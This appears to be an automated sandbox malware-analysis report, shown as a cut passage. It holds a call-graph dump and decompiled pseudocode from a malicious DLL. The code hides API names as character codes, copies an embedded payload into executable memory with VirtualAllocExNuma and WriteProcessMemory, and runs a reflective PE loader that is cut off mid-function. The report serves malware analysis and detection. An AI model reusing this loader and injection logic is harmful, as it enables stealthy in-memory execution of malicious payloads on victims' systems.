21056 1003ff55 __calloc_impl 21055->21056 21071 1004091c 69 API calls 2 library calls 21056->21071 21058 1003ff5c 21059 1003ff98 _doexit 21058->21059 21061 100458a0 
__decode_pointer 5 API calls 21058->21061 21072 10040002 LeaveCriticalSection _doexit 21059->21072 21063 1003ff8b 21061->21063 21062 1003ffe3 21064 1003ffe9 21062->21064 21068 10040011 __calloc_impl 21062->21068 21065 100458a0 __decode_pointer 5 API calls 21063->21065 21073 10040844 LeaveCriticalSection 21064->21073 21065->21059 21067 1003fff6 21074 1003fde5 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 21067->21074 21068->21005 21071->21058 21072->21062 21073->21067 21076 10039fca __calloc_impl 21075->21076 21077 10039fe2 21076->21077 21087 1003a001 _memset 21076->21087 21088 1003f256 69 API calls __getptd_noexit 21077->21088 21079 10039fe7 21089 1004157e 5 API calls 2 library calls 21079->21089 21081 1003a073 RtlAllocateHeap 21081->21087 21082 10039ff7 __calloc_impl 21082->21018 21087->21081 21087->21082 21090 1004091c 69 API calls 2 library calls 21087->21090 21091 10041169 5 API calls 2 library calls 21087->21091 21092 1003a0ba LeaveCriticalSection _doexit 21087->21092 21093 10041456 5 API calls __decode_pointer 21087->21093 21088->21079 21090->21087 21091->21087 21092->21087 21093->21087 21096 10003b30 21094->21096 21095 10003b6f 21097 10003b7e 21095->21097 21169 10052b3c 70 API calls 4 library calls 21095->21169 21096->21095 21100 10003b52 21096->21100 21101 10003b91 21097->21101 21170 10003c80 70 API calls 6 library calls 21097->21170 21153 100039f0 21100->21153 21105 10003ba5 21101->21105 21171 1003a7f6 69 API calls 3 library calls 21101->21171 21103 10003b69 21103->20899 21105->20899 21107 100039f0 std::runtime_error::runtime_error 70 API calls 21106->21107 21108 10003ec1 21107->21108 21178 10003f50 21108->21178 21111 100039f0 std::runtime_error::runtime_error 70 API calls 21112 10003eef ___DllMainCRTStartup 21111->21112 21112->20903 21114 1003a2dd 21113->21114 21125 1003a23e 21113->21125 21199 10041456 5 API calls __decode_pointer 21114->21199 21116 1003a2e3 21200 1003f256 69 API calls __getptd_noexit 21116->21200 21119 1003a2e9 
21119->20910 21122 1003a2a1 RtlAllocateHeap 21122->21125 21123 1003a253 21123->21125 21192 100419a4 69 API calls __NMSG_WRITE 21123->21192 21193 10041804 69 API calls 7 library calls 21123->21193 21194 1003fde5 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 21123->21194 21125->21122 21125->21123 21126 1003a2d4 21125->21126 21127 1003a2c8 21125->21127 21130 1003a2c6 21125->21130 21195 1003a1e1 69 API calls 4 library calls 21125->21195 21196 10041456 5 API calls __decode_pointer 21125->21196 21126->20910 21197 1003f256 69 API calls __getptd_noexit 21127->21197 21198 1003f256 69 API calls __getptd_noexit 21130->21198 21133 1003a230 _malloc 69 API calls 21132->21133 21134 10002d89 21133->21134 21134->20912 21134->21134 21139 10002911 ___DllMainCRTStartup 21135->21139 21136 10002977 21136->20914 21137 100029d7 GetNativeSystemInfo 21137->21136 21138 10002a00 VirtualAlloc 21137->21138 21141 10002a1d 21138->21141 21139->21136 21139->21137 21140 10002a92 LoadLibraryA 21140->21141 21141->21140 21141->21141 21143 10002b02 21141->21143 21142 10002c88 21142->20914 21143->21142 21144 10002c5a VirtualProtect 21143->21144 21144->21136 21144->21143 21146 10039f2b IsDebuggerPresent 21145->21146 21147 10039f29 21145->21147 21201 1004b88d 21146->21201 21147->20916 21150 10040644 SetUnhandledExceptionFilter UnhandledExceptionFilter 21151 10040661 __invoke_watson 21150->21151 21152 10040669 GetCurrentProcess TerminateProcess 21150->21152 21151->21152 21152->20916 21154 10003a03 21153->21154 21155 10003a08 21153->21155 21172 10052bcd 70 API calls 4 library calls 21154->21172 21157 10003a3a 21155->21157 21158 10003a1b 21155->21158 21162 10003a44 21157->21162 21175 10052b3c 70 API calls 4 library calls 21157->21175 21173 10003bf0 70 API calls 2 library calls 21158->21173 21160 10003a27 21174 10003bf0 70 API calls 2 library calls 21160->21174 21166 10003a57 21162->21166 21176 10003c80 70 API calls 6 library calls 21162->21176 21165 10003a31 21165->21103 21168 10003a6a 
21166->21168 21177 1003a7f6 69 API calls 3 library calls 21166->21177 21168->21103 21170->21101 21171->21105 21172->21155 21173->21160 21174->21165 21176->21166 21177->21168 21179 10003f61 21178->21179 21180 10003f7b 21179->21180 21188 10052b3c 70 API calls 4 library calls 21179->21188 21182 10003f93 21180->21182 21187 10003ed7 21180->21187 21189 10052b3c 70 API calls 4 library calls 21180->21189 21185 10003fa6 21182->21185 21190 10003c80 70 API calls 6 library calls 21182->21190 21185->21187 21191 1003a7f6 69 API calls 3 library calls 21185->21191 21187->21111 21190->21185 21191->21187 21192->21123 21193->21123 21195->21125 21196->21125 21197->21130 21198->21126 21199->21116 21200->21119 21201->21150 21393 1000fb05 115 API calls ~_Task_impl 21394 1002ef09 GetFileSize GetLastError GetLastError 21395 10015f0f 114 API calls ~_Task_impl 21397 1002e50d Escape Escape 21398 10008b10 OffsetViewportOrgEx OffsetViewportOrgEx 21399 10018b13 128 API calls ~_Task_impl 21400 1000e713 117 API calls 2 library calls 21402 1001cd19 124 API calls 21403 1001691a 135 API calls 21404 1002c719 116 API calls 21405 1002c51c 125 API calls 3 library calls 21406 10029f1d EnterCriticalSection LeaveCriticalSection 21407 1002f123 86 API calls ~_Task_impl 21408 10025b20 135 API calls 2 library calls 21409 10016d22 127 API calls 21411 10035925 154 API calls 21412 1002ed24 ReadFile GetLastError 21414 1003712b PeekMessageA DispatchMessageA PeekMessageA 21415 10020733 117 API calls 21416 1003f730 79 API calls 3 library calls 21418 10024735 108 API calls 21419 10023738 GetViewportOrgEx 21420 10017340 CreateDataAdviseHolder 21421 1003a742 71 API calls 3 library calls 21422 10039b41 123 API calls 21423 10017142 6 API calls ___init_ctype 21425 10033f45 DrawTextA GetCurrentPositionEx MoveToEx 21426 1003eb44 71 API calls ___InternalCxxFrameHandler 21427 1000c547 DefWindowProcA CallWindowProcA 21428 1002e948 7 API calls ~_Task_impl 21430 1003594e 6 API calls 21431 10008b4d SetViewportExtEx SetViewportExtEx 
21432 1001b550 71 API calls 3 library calls 21434 1001d557 83 API calls 21435 10028b59 155 API calls 21436 1002e759 8 API calls ~_Task_impl 21437 1001635f 111 API calls 21439 10005160 151 API calls 2 library calls 21440 1001b360 128 API calls 21441 10014b67 7 API calls 21442 1002ed64 84 API calls 21443 1001cb66 123 API calls 21444 10012768 14 API calls ___init_ctype 21445 1001b76b GetTextExtentPoint32A 21446 1000896b BitBlt 21447 10028f6d 116 API calls ~_Task_impl 21448 10037973 18 API calls 21449 10004570 125 API calls 21450 10037171 PeekMessageA 21451 10034576 213 API calls 2 library calls 21452 10032d7b GetWindowLongA GetWindowLongA AdjustWindowRectEx AdjustWindowRectEx 21454 10044787 103 API calls _write_multi_char 21457 1002d785 131 API calls 3 library calls 21458 10033f8b DrawTextExA GetCurrentPositionEx MoveToEx 21460 10008b8a ScaleViewportExtEx ScaleViewportExtEx 21462 10026588 RegOpenKeyExA RegQueryValueExA RegCloseKey 21463 10033188 GetScrollPos 21464 1001718d 6 API calls ___init_ctype 21465 1001898e lstrcmpA LocalAlloc RaiseException 21466 10005d90 194 API calls ~_Task_impl 21467 10032f90 126 API calls ~_Task_impl 21469 1001bd99 10 API calls 21470 1001f598 SendMessageA LocalAlloc RaiseException ~_Task_impl 21471 1001519d 133 API calls 21472 1002d99e 149 API calls 21473 100527a5 7 API calls ___init_ctype 21474 100103a3 118 API calls ~_Task_impl 21475 100139a2 6 API calls ~_Task_impl 21477 10010ba7 126 API calls 21478 100415a2 104 API calls 5 library calls 21479 1002bda5 10 API calls 21480 1002dda9 132 API calls 21481 1002edaf SetFilePointer GetLastError GetLastError 21482 100181b1 120 API calls 21484 100263b7 162 API calls 21488 1000f1c2 114 API calls 21490 1001cfc4 69 API calls 21491 100477c3 120 API calls 6 library calls 21492 10009bc9 114 API calls 21493 100269ce 157 API calls 21494 1002e9d3 89 API calls 3 library calls 21495 1001b3d4 120 API calls 21497 100419dd 71 API calls 3 library calls 21499 10013bda 118 API calls ~_Task_impl 21500 1001f7da 158 
API calls 21501 100149dc 129 API calls 21502 100053e0 225 API calls 4 library calls 21503 100379e6 SendMessageA ScreenToClient SendMessageA 21504 100263e7 90 API calls 21505 1000d1e8 107 API calls 21506 100089ef ExtTextOutA 21507 10016df1 120 API calls 21508 100167f3 113 API calls 21509 1002bbf1 129 API calls ~_Task_impl 21510 1002bff5 113 API calls 21511 1001d7ff 114 API calls

                                                                                                        Executed Functions

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 71%
                                                                                                        			E10003360(void* __ebp) {
                                                                                                        				void* _v12;
                                                                                                        				signed int _v16;
                                                                                                        				void* _v20;
                                                                                                        				short _v22;
                                                                                                        				short _v24;
                                                                                                        				short _v26;
                                                                                                        				short _v28;
                                                                                                        				short _v30;
                                                                                                        				signed int _v32;
                                                                                                        				short _v34;
                                                                                                        				short _v36;
                                                                                                        				short _v38;
                                                                                                        				short _v40;
                                                                                                        				short _v42;
                                                                                                        				char _v44;
                                                                                                        				short _v46;
                                                                                                        				short _v48;
                                                                                                        				short _v50;
                                                                                                        				short _v52;
                                                                                                        				short _v54;
                                                                                                        				short _v56;
                                                                                                        				short _v58;
                                                                                                        				short _v60;
                                                                                                        				short _v62;
                                                                                                        				char _v64;
                                                                                                        				char _v68;
                                                                                                        				SIZE_T* _v72;
                                                                                                        				intOrPtr _v84;
                                                                                                        				char _v88;
                                                                                                        				char _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				char _v108;
                                                                                                        				intOrPtr _v112;
                                                                                                        				void* _v116;
                                                                                                        				char _v132;
                                                                                                        				char _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				SIZE_T* _v144;
                                                                                                        				char _v152;
                                                                                                        				char _v156;
                                                                                                        				char _v160;
                                                                                                        				char _v164;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t63;
                                                                                                        				signed int _t65;
                                                                                                        				struct HINSTANCE__* _t72;
                                                                                                        				intOrPtr _t77;
                                                                                                        				char* _t79;
                                                                                                        				intOrPtr _t81;
                                                                                                        				void* _t82;
                                                                                                        				intOrPtr _t88;
                                                                                                        				void* _t98;
                                                                                                        				intOrPtr* _t112;
                                                                                                        				void* _t113;
                                                                                                        				void* _t115;
                                                                                                        				intOrPtr _t119;
                                                                                                        				void* _t120;
                                                                                                        				void* _t122;
                                                                                                        				intOrPtr* _t124;
                                                                                                        				void* _t126;
                                                                                                        				signed int _t127;
                                                                                                        				void* _t128;
                                                                                                        				void* _t129;
                                                                                                        				void* _t130;
                                                                                                        				signed int _t131;
                                                                                                        
                                                                                                        				_push(0xffffffff);
                                                                                                        				_push(E10056D5B);
                                                                                                        				_push( *[fs:0x0]);
                                                                                                        				_t127 = _t126 - 0x88;
                                                                                                        				_t63 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v16 = _t63 ^ _t127;
                                                                                                        				_t65 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_push(_t65 ^ _t127);
                                                                                                        				 *[fs:0x0] =  &_v12;
                                                                                                        				_v68 = 0xf;
                                                                                                        				_v72 = 0;
                                                                                                        				_v88 = 0;
                                                                                                        				E10003B20( &_v92, "Virtual", 7);
                                                                                                        				_v12 = 0;
                                                                                                        				_v132 = 0xf;
                                                                                                        				_v136 = 0;
                                                                                                        				_v152 = 0;
                                                                                                        				E10003B20( &_v156, "AllocExNuma", 0xb);
                                                                                                        				_push( &_v164);
                                                                                                        				_v20 = 1;
                                                                                                        				E10003E70( &_v136,  &_v108);
                                                                                                        				_t128 = _t127 + 0xc;
                                                                                                        				_v20 = 2;
                                                                                                        				_t72 = LoadLibraryA("whoami.exe"); // executed
                                                                                                        				if(_t72 == 0) {
                                                                                                        					MessageBoxA(0, 0x100624cc, 0, 0);
                                                                                                        					ExitProcess(0xfff4518a);
                                                                                                        				}
                                                                                                        				_v42 = 0x65;
                                                                                                        				_v36 = 0x65;
                                                                                                        				_v34 = 0x6c;
                                                                                                        				_v24 = 0x6c;
                                                                                                        				_v22 = 0x6c;
                                                                                                        				_v58 = 0x6c;
                                                                                                        				_v56 = 0x6c;
                                                                                                        				_v50 = 0x6c;
                                                                                                        				_v48 = 0x6c;
                                                                                                        				_t110 = 0x2e;
                                                                                                        				 *0x10097068 = 0;
                                                                                                        				 *0x1009706c = 0;
                                                                                                        				 *0x10097070 = 0;
                                                                                                        				 *0x10097074 = 0;
                                                                                                        				 *0x10097078 = 0;
                                                                                                        				_v44 = 0x6b;
                                                                                                        				_v40 = 0x72;
                                                                                                        				_v38 = 0x6e;
                                                                                                        				_v32 = 0x33;
                                                                                                        				_v30 = 0x32;
                                                                                                        				_v28 = 0x2e;
                                                                                                        				_v26 = 0x64;
                                                                                                        				_v20 = 0;
                                                                                                        				_v64 = 0x6e;
                                                                                                        				_v62 = 0x74;
                                                                                                        				_v60 = 0x64;
                                                                                                        				_v54 = 0x2e;
                                                                                                        				_v52 = 0x64;
                                                                                                        				_v46 = 0;
                                                                                                        				 *0x10099e84 = E100031D0( &_v44);
                                                                                                        				_t77 = E100031D0( &_v64);
                                                                                                        				_t119 =  *0x10099e84; // 0x73b60000
                                                                                                        				 *0x10099e88 = _t77;
                                                                                                        				_t124 = E10002820(_t119, "VirtualAlloc");
                                                                                                        				_t79 = _v116;
                                                                                                        				_t129 = _t128 + 0xc;
                                                                                                        				 *0x10099d78 = _t124;
                                                                                                        				if(_v96 < 0x10) {
                                                                                                        					_t79 =  &_v116;
                                                                                                        				}
                                                                                                        				_t112 = E10002820(_t119, _t79);
                                                                                                        				 *0x10099d7c = _t112;
                                                                                                        				_t81 = E10002820(_t119, "WriteProcessMemory");
                                                                                                        				_t130 = _t129 + 8;
                                                                                                        				_t135 = _t112;
                                                                                                        				 *0x10099d80 = _t81;
                                                                                                        				if(_t112 == 0) {
                                                                                                        					_t82 =  *_t124(0, 0x23400, 0x3000, 0x40);
                                                                                                        				} else {
                                                                                                        					_t82 =  *_t112(0xffffffff, 0, 0x23400, 0x3000, 0x40, 0); // executed
                                                                                                        				}
                                                                                                        				_t120 = _t82;
                                                                                                        				WriteProcessMemory(0xffffffff, _t120, 0x10073c28, 0x23400, 0); // executed
                                                                                                        				_t113 = E1003A230(0, _t110, _t112, _t120, 0x612d);
                                                                                                        				_push(_t113);
                                                                                                        				E10002D70(_t135);
                                                                                                        				_push(_t120);
                                                                                                        				_push(_t113);
                                                                                                        				E10002FB0();
                                                                                                        				_t131 = _t130 + 0x10;
                                                                                                        				_t88 = E100028F0(_t120, _t135);
                                                                                                        				_v20 = 1;
                                                                                                        				_t136 = _v112 - 0x10;
                                                                                                        				 *0x10099e8c = _t88;
                                                                                                        				if(_v112 >= 0x10) {
                                                                                                        					_t110 = _v132;
                                                                                                        					_push(_v132);
                                                                                                        					E10007788(0, _t113, 0x10, _t136);
                                                                                                        					_t131 = _t131 + 4;
                                                                                                        				}
                                                                                                        				_v20 = 0;
                                                                                                        				_t137 = _v140 - 0x10;
                                                                                                        				_v112 = 0xf;
                                                                                                        				_v116 = 0;
                                                                                                        				_v132 = 0;
                                                                                                        				if(_v140 >= 0x10) {
                                                                                                        					_push(_v160);
                                                                                                        					E10007788(0, 0xf, 0x10, _t137);
                                                                                                        					_t131 = _t131 + 4;
                                                                                                        				}
                                                                                                        				_v20 = 0xffffffff;
                                                                                                        				_t138 = _v84 - 0x10;
                                                                                                        				_v140 = 0xf;
                                                                                                        				_v144 = 0;
                                                                                                        				_v160 = 0;
                                                                                                        				if(_v84 >= 0x10) {
                                                                                                        					_push(_v104);
                                                                                                        					E10007788(0, 0xf, 0x10, _t138);
                                                                                                        					_t131 = _t131 + 4;
                                                                                                        				}
                                                                                                        				 *[fs:0x0] = _v28;
                                                                                                        				_pop(_t115);
                                                                                                        				_pop(_t122);
                                                                                                        				_pop(_t98);
                                                                                                        				return E10039F21(1, _t98, _v32 ^ _t131, _t110, _t115, _t122);
                                                                                                        			}

                                                                                                        APIs
                                                                                                          • Part of subcall function 10003B20: std::_String_base::_Xlen.LIBCPMT ref: 10003B79
                                                                                                          • Part of subcall function 10003B20: _memcpy_s.LIBCMT ref: 10003BC1
                                                                                                        • LoadLibraryA.KERNEL32 ref: 1000340D
                                                                                                        • MessageBoxA.USER32 ref: 1000341F
                                                                                                        • ExitProcess.KERNEL32 ref: 1000342A
                                                                                                        • VirtualAllocExNuma.KERNEL32(000000FF,00000000,00023400,00003000,00000040,00000000,?,?,?,?,whoami.exe,?,?,00000001), ref: 10003584
                                                                                                        • WriteProcessMemory.KERNEL32(000000FF,00000000,10073C28,00023400,00000000,?,?,?,?,whoami.exe,?,?,00000001), ref: 100035A7
                                                                                                        • _malloc.LIBCMT ref: 100035B2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$AllocExitLibraryLoadMemoryMessageNumaString_base::_VirtualWriteXlen_malloc_memcpy_sstd::_
                                                                                                        • String ID: 2$3$AllocExNuma$Virtual$VirtualAlloc$WriteProcessMemory$k$r$t$whoami.exe
                                                                                                        • API String ID: 994591851-3946485921
                                                                                                        • Opcode ID: 9c61376587c97d8699a7e934eefeb59288f19cbfc5aee6d6b65908fd66674986
                                                                                                        • Instruction ID: c0a1e0671d0e3eac80fea2126b87aa602ad3fdf1e64c6740749f95463a10d17d
                                                                                                        • Opcode Fuzzy Hash: 9c61376587c97d8699a7e934eefeb59288f19cbfc5aee6d6b65908fd66674986
                                                                                                        • Instruction Fuzzy Hash: A4718EB59183809AE321DF64CC81B5BBBE8FF99344F50492EF29C872A1EB759404CB57
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        [Control-flow graph for function 100028F0; graph image not reproduced. Legend: Executed / Not Executed.]
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E100028F0(intOrPtr* __eax, void* __eflags) {
                                                                                                        				void* __esi;
                                                                                                        				intOrPtr _t106;
                                                                                                        				intOrPtr _t108;
                                                                                                        				signed char _t110;
                                                                                                        				signed int _t113;
                                                                                                        				void* _t114;
                                                                                                        				intOrPtr* _t115;
                                                                                                        				long _t117;
                                                                                                        				long _t118;
                                                                                                        				void* _t120;
                                                                                                        				signed int _t125;
                                                                                                        				int _t128;
                                                                                                        				long _t132;
                                                                                                        				signed int _t133;
                                                                                                        				long* _t135;
                                                                                                        				struct HINSTANCE__* _t143;
                                                                                                        				signed int _t144;
                                                                                                        				long _t147;
                                                                                                        				long _t148;
                                                                                                        				char* _t153;
                                                                                                        				intOrPtr* _t154;
                                                                                                        				long _t155;
                                                                                                        				signed short* _t156;
                                                                                                        				signed int* _t158;
                                                                                                        				long _t160;
                                                                                                        				long _t161;
                                                                                                        				long _t162;
                                                                                                        				long _t163;
                                                                                                        				unsigned short _t171;
                                                                                                        				intOrPtr* _t182;
                                                                                                        				intOrPtr _t183;
                                                                                                        				long _t184;
                                                                                                        				void* _t185;
                                                                                                        				intOrPtr _t187;
                                                                                                        				intOrPtr _t190;
                                                                                                        				long _t193;
                                                                                                        				void* _t196;
                                                                                                        				long _t197;
                                                                                                        				intOrPtr* _t200;
                                                                                                        				intOrPtr _t201;
                                                                                                        				intOrPtr* _t203;
                                                                                                        				void* _t204;
                                                                                                        				long _t205;
                                                                                                        				long _t207;
                                                                                                        				struct HINSTANCE__* _t208;
                                                                                                        				long _t209;
                                                                                                        				intOrPtr _t211;
                                                                                                        				void* _t215;
                                                                                                        				unsigned int _t217;
                                                                                                        				long _t219;
                                                                                                        				signed int _t220;
                                                                                                        				long* _t222;
                                                                                                        				long _t223;
                                                                                                        				long _t224;
                                                                                                        				long _t225;
                                                                                                        				long _t226;
                                                                                                        				long _t227;
                                                                                                        				intOrPtr* _t229;
                                                                                                        				signed int* _t230;
                                                                                                        				intOrPtr* _t232;
                                                                                                        				void* _t233;
                                                                                                        				void* _t234;
                                                                                                        
                                                                                                        				_t201 =  *0x10099e84; // 0x73b60000
                                                                                                        				_t226 = 0;
                                                                                                        				_t154 = __eax;
                                                                                                        				 *((intOrPtr*)(_t233 + 0x30)) = 0;
                                                                                                        				 *((intOrPtr*)(_t233 + 0x2c)) = E10002820(_t201, "LoadLibraryA");
                                                                                                        				 *((intOrPtr*)(_t233 + 0x34)) = E10002820(_t201, "GetProcAddress");
                                                                                                        				 *((intOrPtr*)(_t233 + 0x30)) = E10002820(_t201, "VirtualAlloc");
                                                                                                        				_t106 = E10002820(_t201, "VirtualProtect");
                                                                                                        				_t211 =  *0x10099e88; // 0x770b0000
                                                                                                        				 *((intOrPtr*)(_t233 + 0x44)) = _t106;
                                                                                                        				 *((intOrPtr*)(_t233 + 0x4c)) = E10002820(_t211, "NtFlushInstructionCache");
                                                                                                        				_t108 = E10002820(_t201, "GetNativeSystemInfo");
                                                                                                        				_t203 =  *((intOrPtr*)(_t154 + 0x3c)) + _t154;
                                                                                                        				_t234 = _t233 + 0x18;
                                                                                                        				 *((intOrPtr*)(_t234 + 0x1c)) = _t108;
                                                                                                        				 *((intOrPtr*)(_t234 + 0x14)) = _t203;
                                                                                                        				if( *_t203 == 0x4550) {
                                                                                                        					__eflags =  *((short*)(_t203 + 4)) - 0x14c;
                                                                                                        					if( *((short*)(_t203 + 4)) != 0x14c) {
                                                                                                        						goto L1;
                                                                                                        					} else {
                                                                                                        						_t110 =  *(_t203 + 0x38);
                                                                                                        						__eflags = _t110 & 0x00000001;
                                                                                                        						 *(_t234 + 0x18) = _t110;
                                                                                                        						if((_t110 & 0x00000001) != 0) {
                                                                                                        							goto L1;
                                                                                                        						} else {
                                                                                                        							_t185 = ( *(_t203 + 0x14) & 0x0000ffff) + _t203 + 0x18;
                                                                                                        							_t160 =  *(_t203 + 6) & 0x0000ffff;
                                                                                                        							__eflags = _t160;
                                                                                                        							if(_t160 > 0) {
                                                                                                        								_t200 = _t185 + 0xc;
                                                                                                        								 *(_t234 + 0x10) = _t160;
                                                                                                        								do {
                                                                                                        									_t225 =  *(_t200 + 4);
                                                                                                        									__eflags = _t225;
                                                                                                        									_t183 =  *_t200;
                                                                                                        									if(_t225 != 0) {
                                                                                                        										_t184 = _t183 + _t225;
                                                                                                        										__eflags = _t184;
                                                                                                        									} else {
                                                                                                        										_t203 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                        										_t184 = _t183 + _t110;
                                                                                                        										_t110 =  *(_t234 + 0x18);
                                                                                                        									}
                                                                                                        									__eflags = _t184 - _t226;
                                                                                                        									if(_t184 > _t226) {
                                                                                                        										_t226 = _t184;
                                                                                                        									}
                                                                                                        									_t200 = _t200 + 0x28;
                                                                                                        									_t23 = _t234 + 0x10;
                                                                                                        									 *_t23 =  *(_t234 + 0x10) - 1;
                                                                                                        									__eflags =  *_t23;
                                                                                                        								} while ( *_t23 != 0);
                                                                                                        							}
                                                                                                        							 *((intOrPtr*)(_t234 + 0x20))(_t234 + 0x38);
                                                                                                        							_t187 =  *((intOrPtr*)(_t234 + 0x3c));
                                                                                                        							_t161 =  *(_t203 + 0x50);
                                                                                                        							_t113 =  !(_t187 - 1);
                                                                                                        							__eflags = (_t161 + _t187 - 0x00000001 & _t113) - (_t187 + _t226 - 0x00000001 & _t113);
                                                                                                        							if((_t161 + _t187 - 0x00000001 & _t113) != (_t187 + _t226 - 0x00000001 & _t113)) {
                                                                                                        								goto L1;
                                                                                                        							} else {
                                                                                                        								_t114 = VirtualAlloc(0, _t161, 0x3000, 4);
                                                                                                        								_t162 =  *(_t203 + 0x54);
                                                                                                        								__eflags = _t162;
                                                                                                        								_t215 = _t114;
                                                                                                        								 *(_t234 + 0x10) = _t215;
                                                                                                        								_t115 = _t154;
                                                                                                        								if(_t162 != 0) {
                                                                                                        									_t224 = _t215 - _t154;
                                                                                                        									__eflags = _t224;
                                                                                                        									goto L15;
                                                                                                        									L15:
                                                                                                        									_t162 = _t162 - 1;
                                                                                                        									 *((char*)(_t224 + _t115)) =  *_t115;
                                                                                                        									_t115 = _t115 + 1;
                                                                                                        									__eflags = _t162;
                                                                                                        									if(_t162 != 0) {
                                                                                                        										goto L15;
                                                                                                        									} else {
                                                                                                        										_t203 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                        									}
                                                                                                        								}
                                                                                                        								_t190 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                        								_t227 =  *(_t190 + 6) & 0x0000ffff;
                                                                                                        								__eflags = _t227;
                                                                                                        								_t204 = ( *(_t203 + 0x14) & 0x0000ffff) + _t203 + 0x18;
                                                                                                        								if(_t227 != 0) {
                                                                                                        									_t209 = _t204 + 0x14;
                                                                                                        									__eflags = _t209;
                                                                                                        									do {
                                                                                                        										_t223 =  *(_t209 - 4);
                                                                                                        										_t153 =  *((intOrPtr*)(_t209 - 8)) +  *(_t234 + 0x10);
                                                                                                        										_t227 = _t227 - 1;
                                                                                                        										_t182 =  *_t209 + _t154;
                                                                                                        										__eflags = _t223;
                                                                                                        										if(_t223 != 0) {
                                                                                                        											do {
                                                                                                        												_t223 = _t223 - 1;
                                                                                                        												 *_t153 =  *_t182;
                                                                                                        												_t153 = _t153 + 1;
                                                                                                        												_t182 = _t182 + 1;
                                                                                                        												__eflags = _t223;
                                                                                                        											} while (_t223 != 0);
                                                                                                        											_t190 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                        										}
                                                                                                        										_t209 = _t209 + 0x28;
                                                                                                        										__eflags = _t227;
                                                                                                        									} while (_t227 != 0);
                                                                                                        								}
                                                                                                        								_t229 =  *((intOrPtr*)(_t190 + 0x80)) +  *(_t234 + 0x10);
                                                                                                        								_t117 =  *(_t229 + 0xc);
                                                                                                        								__eflags = _t117;
                                                                                                        								if(_t117 != 0) {
                                                                                                        									do {
                                                                                                        										_t143 = LoadLibraryA(_t117 +  *(_t234 + 0x10));
                                                                                                        										_t197 =  *(_t234 + 0x10);
                                                                                                        										_t222 =  *((intOrPtr*)(_t229 + 0x10)) + _t197;
                                                                                                        										_t158 =  *_t229 + _t197;
                                                                                                        										__eflags =  *_t222;
                                                                                                        										_t208 = _t143;
                                                                                                        										while( *_t222 != 0) {
                                                                                                        											_t144 =  *_t158;
                                                                                                        											__eflags = _t144;
                                                                                                        											if(__eflags == 0 || __eflags >= 0) {
                                                                                                        												_t147 =  *_t222 + _t197 + 2;
                                                                                                        												__eflags = _t147;
                                                                                                        												_t148 =  *((intOrPtr*)(_t234 + 0x30))(_t208, _t147);
                                                                                                        												_t197 =  *(_t234 + 0x10);
                                                                                                        												 *_t222 = _t148;
                                                                                                        											} else {
                                                                                                        												 *_t222 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x3c)) + _t208 + 0x78)) + _t208 + 0x1c)) + ((_t144 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x3c)) + _t208 + 0x78)) + _t208 + 0x10))) * 4 + _t208)) + _t208;
                                                                                                        											}
                                                                                                        											_t222 =  &(_t222[1]);
                                                                                                        											_t158 =  &(_t158[1]);
                                                                                                        											__eflags =  *_t222;
                                                                                                        										}
                                                                                                        										_t117 =  *(_t229 + 0x20);
                                                                                                        										_t229 = _t229 + 0x14;
                                                                                                        										__eflags = _t117;
                                                                                                        									} while (_t117 != 0);
                                                                                                        									_t190 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                        								}
                                                                                                        								_t118 =  *(_t234 + 0x10);
                                                                                                        								_t217 = _t118 -  *((intOrPtr*)(_t190 + 0x34));
                                                                                                        								__eflags =  *(_t190 + 0xa4);
                                                                                                        								if( *(_t190 + 0xa4) != 0) {
                                                                                                        									_t232 =  *((intOrPtr*)(_t190 + 0xa0)) + _t118;
                                                                                                        									_t132 =  *(_t232 + 4);
                                                                                                        									__eflags = _t132;
                                                                                                        									if(_t132 != 0) {
                                                                                                        										do {
                                                                                                        											_t196 =  *_t232 +  *(_t234 + 0x10);
                                                                                                        											_t73 = _t132 - 8; // 0x144
                                                                                                        											_t207 = _t73 >> 1;
                                                                                                        											__eflags = _t207;
                                                                                                        											_t156 = _t232 + 8;
                                                                                                        											if(_t207 != 0) {
                                                                                                        												do {
                                                                                                        													_t133 =  *_t156 & 0x0000ffff;
                                                                                                        													_t171 = _t133 >> 0xc;
                                                                                                        													_t207 = _t207 - 1;
                                                                                                        													__eflags = _t171 - 0xa;
                                                                                                        													if(_t171 != 0xa) {
                                                                                                        														__eflags = _t171 - 3;
                                                                                                        														if(_t171 != 3) {
                                                                                                        															__eflags = _t171 - 1;
                                                                                                        															if(_t171 != 1) {
                                                                                                        																__eflags = _t171 - 2;
                                                                                                        																if(_t171 == 2) {
                                                                                                        																	_t135 = (_t133 & 0x00000fff) + _t196;
